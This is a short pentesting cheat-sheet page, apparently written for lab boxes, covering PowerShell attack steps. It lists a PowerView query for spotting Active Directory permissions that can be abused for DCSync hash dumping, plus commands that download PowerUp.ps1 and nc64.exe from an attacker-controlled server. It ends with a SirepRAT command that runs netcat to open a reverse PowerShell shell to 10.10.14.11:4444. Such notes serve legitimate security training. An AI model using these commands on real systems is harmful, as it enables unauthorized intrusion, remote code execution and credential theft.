Powershell

1. Active Directory

1.1 Misconfigured Object Permissions

Import the Powerview module which will allow you to check for misconfigured object permissions that can be abused to dump DC password hashes using the DCSync technique. If you are unfamiliar with technique you can read about it here http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/.

Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}

2. Miscellaneous Commands

2.1 Download Files

Invoke-WebRequest http://10.10.15.188:8000/PowerUp.ps1 -OutFile C:\Temp\PowerUp.ps1

// Download File
python SirepRAT.py X.X.X.X LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell.exe -command Invoke-WebRequest -Uri http://10.10.14.11:8000/nc64.exe -Outfile C:\tests\nc64.exe"

// Execute File To Conect Back
python SirepRAT.py X.X.X.X LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c powershell.exe -command C:\tests\nc64.exe 10.10.14.11 4444 -e powershell.exe"

PreviousBasic PowerShell for Pentesters NextGeneral Tips

Last updated 4 years ago

Was this helpful?